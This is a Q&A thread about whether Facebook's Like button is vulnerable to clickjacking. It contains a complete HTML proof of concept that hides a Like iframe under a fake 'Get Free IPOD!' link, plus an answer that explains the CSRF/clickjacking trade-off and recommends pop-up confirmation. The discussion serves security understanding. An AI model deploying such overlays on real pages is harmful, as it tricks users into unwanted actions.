Does facebook like button vulnerable to clickjacking?

Question

Few days before I have read regarding clickjacking attack from http://javascript.info/tutorial/clickjacking . So today I tried with facebook like button. and It seems that i am successful in the experiment.

But i am not sure weather i am correct or not? This is the code snippet I have used.

<html>
<head>
    <script>
      window.fbAsyncInit = function() {
        FB.init({
          appId      : '********',
          xfbml      : true,
          version    : 'v2.1'
        });
      };

      (function(d, s, id){
         var js, fjs = d.getElementsByTagName(s)[0];
         if (d.getElementById(id)) {return;}
         js = d.createElement(s); js.id = id;
         js.src = "//connect.facebook.net/en_US/sdk.js";
         fjs.parentNode.insertBefore(js, fjs);
       }(document, 'script', 'facebook-jssdk'));
    </script>
    <style>
        iframe { /* iframe from facebook.com */
          width:140px;
          height:100px;
          margin-top: 100px;
          margin-left: 50px;
          position:absolute;
          top:0; left:0;
          filter:alpha(opacity=50); /* in real life opacity=0 */
          opacity:0.5;
        }
        .a{
            margin-top: 95px;
        }
    </style>
</head>
<body>
    <div class="a">
        <a  href="http://www.google.com" target="_blank" style="position:relative;left:20px;z-index:-1">Get Free IPOD!</a>
    </div>
    <iframe src="//www.facebook.com/plugins/like.php?href=https%3A%2F%2Fwww.facebook.com%2FTimesnow&amp;width&amp;layout=button&amp;action=like&amp;show_faces=false&amp;share=false&amp;height=35&amp;appId=*****" scrolling="no" frameborder="0" style="border:none; overflow:hidden; height:35px;" allowTransparency="true"></iframe>
</body>
</html>

I can set the opacity of the iframe to 0 so that user can not see the fb like button when the user will click on the link , the attacker page will be automatically liked.

Example Fiddle: http://jsfiddle.net/5e5kvxk4/2/

Am I missing something? or facebook like button is really vulnerable ?

Answer 1

Yes, it probably is vulnerable to click jacking. There isn't a good solution to protect widgets from forged requests using current web technologies.

The widget will either be vulnerable to clickjacking or CSRF as explained here:

From " How to protect widgets from forged requests ":

You don't want this [widget] to be vulnerable to CSRF so you write an iframe to the page. Based on the origin inheritance rules the parent site won't be able to read the CSRF token. However what about clickjacking (or likejacking )? Because of CSRF you must be within an iframe and there for the x-frame-options cannot help, and the same holds true for frame-busters

The best solution at present appears to be employing a pop up window in order to validate the click:

Clicking on the widget needs to open a pop-up window containing a new page -- an iframe is not good enough, it must be a new window -- which is entirely under the control of your web application. Confirm the action, whatever it is, on that page.

Yes, this is somewhat inelegant, but the present Web security architecture doesn't give you any better options.